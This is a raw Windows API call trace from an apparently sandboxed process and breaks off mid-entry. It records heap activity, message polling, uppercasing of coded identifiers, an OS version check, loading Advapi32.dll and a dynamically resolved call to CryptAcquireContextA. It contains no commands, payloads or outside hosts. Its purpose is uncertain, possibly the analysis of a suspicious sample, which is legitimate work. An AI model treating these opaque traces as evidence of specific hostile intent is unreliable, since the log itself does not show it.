[0207.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722b8 [0207.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa948 | out: hHeap=0x2af0000) returned 1 [0207.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0207.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa840 [0207.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8b8 [0207.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722f8 [0207.913] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa08 | out: hHeap=0x2af0000) returned 1 [0207.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0207.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0207.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0207.913] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0207.913] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9d8 | out: hHeap=0x2af0000) returned 1 [0207.913] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0207.913] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0207.913] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0207.913] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaaf8 | out: hHeap=0x2af0000) returned 1 [0207.913] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0207.913] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8b8 | out: hHeap=0x2af0000) returned 1 [0207.913] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77eb8 | out: hHeap=0x2af0000) returned 1 [0207.913] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0207.913] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0207.913] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0207.913] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c38 | out: hHeap=0x2af0000) returned 1 [0207.913] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0207.913] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0207.913] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0207.914] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0207.914] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77aa8 | out: hHeap=0x2af0000) returned 1 [0207.914] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0207.914] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0207.914] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaae0 | out: hHeap=0x2af0000) returned 1 [0207.914] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9d8 | out: hHeap=0x2af0000) returned 1 [0207.914] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0207.914] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0207.914] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0207.914] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec80 | out: hHeap=0x2af0000) returned 1 [0207.914] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0207.914] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0207.914] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d50 | out: hHeap=0x2af0000) returned 1 [0207.914] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0207.914] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0207.914] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0207.914] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0207.914] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77eb8 | out: hHeap=0x2af0000) returned 1 [0207.914] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0207.914] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9d8 | out: hHeap=0x2af0000) returned 1 [0207.914] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0207.914] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa948 | out: hHeap=0x2af0000) returned 1 [0207.914] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0207.914] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0207.914] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0207.914] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ecc0 | out: hHeap=0x2af0000) returned 1 [0207.914] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0207.914] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0207.914] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9d8 | out: hHeap=0x2af0000) returned 1 [0207.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0207.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaae0 | out: hHeap=0x2af0000) returned 1 [0207.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0207.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0207.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0207.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa08 | out: hHeap=0x2af0000) returned 1 [0207.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0207.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0207.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaae0 | out: hHeap=0x2af0000) returned 1 [0207.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9d8 | out: hHeap=0x2af0000) returned 1 [0207.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f60 | out: hHeap=0x2af0000) returned 1 [0207.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0207.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0207.915] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0207.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0207.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0207.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa38 | out: hHeap=0x2af0000) returned 1 [0207.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0207.915] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x76390000 [0207.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0207.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa948 | out: hHeap=0x2af0000) returned 1 [0207.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0207.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72358 | out: hHeap=0x2af0000) returned 1 [0207.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0207.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0207.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9d8 | out: hHeap=0x2af0000) returned 1 [0207.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c38 | out: hHeap=0x2af0000) returned 1 [0207.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0207.916] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0207.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0207.916] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0207.916] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0207.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77aa8 | out: hHeap=0x2af0000) returned 1 [0207.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0207.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0207.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab10 | out: hHeap=0x2af0000) returned 1 [0207.916] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0207.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72358 | out: hHeap=0x2af0000) returned 1 [0207.916] CharUpperBuffW (in: lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0207.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d50 | out: hHeap=0x2af0000) returned 1 [0207.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72358 | out: hHeap=0x2af0000) returned 1 [0207.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0207.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa948 | out: hHeap=0x2af0000) returned 1 [0207.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8d0 | out: hHeap=0x2af0000) returned 1 [0207.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0207.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0207.916] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0207.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e6c0 | out: hHeap=0x2af0000) returned 1 [0207.916] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0207.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0207.917] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa948 | out: hHeap=0x2af0000) returned 1 [0207.917] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8d0 | out: hHeap=0x2af0000) returned 1 [0207.917] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0207.917] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0207.917] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0207.917] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0207.917] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0207.917] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0207.917] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0207.917] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0207.917] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0207.917] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0207.917] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0207.917] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0207.917] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0207.917] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0207.917] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0207.917] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0207.917] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f7000, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0207.918] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0207.918] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f6f60, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0207.918] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa7ba28) returned 1 [0207.918] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0207.918] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0207.918] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0207.918] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0207.919] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0207.919] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0207.919] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0207.919] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0207.919] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0207.919] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0207.919] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0207.919] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0207.919] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0207.919] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0207.919] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0207.919] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0207.919] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0207.919] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0207.919] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0207.919] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0207.919] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0207.919] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0207.919] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0207.919] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0207.919] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0207.919] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0207.919] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0207.920] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0207.920] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0207.920] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0207.920] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0207.920] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0207.920] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0207.920] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0207.920] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0207.920] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0207.920] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0207.920] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0207.920] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0207.920] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0207.920] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0207.920] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0207.920] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0207.920] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0207.920] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0207.920] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0207.920] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0207.920] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0207.920] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0207.920] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0207.920] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0207.921] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0207.921] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0207.921] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0207.921] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0207.921] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0207.921] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0207.921] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: 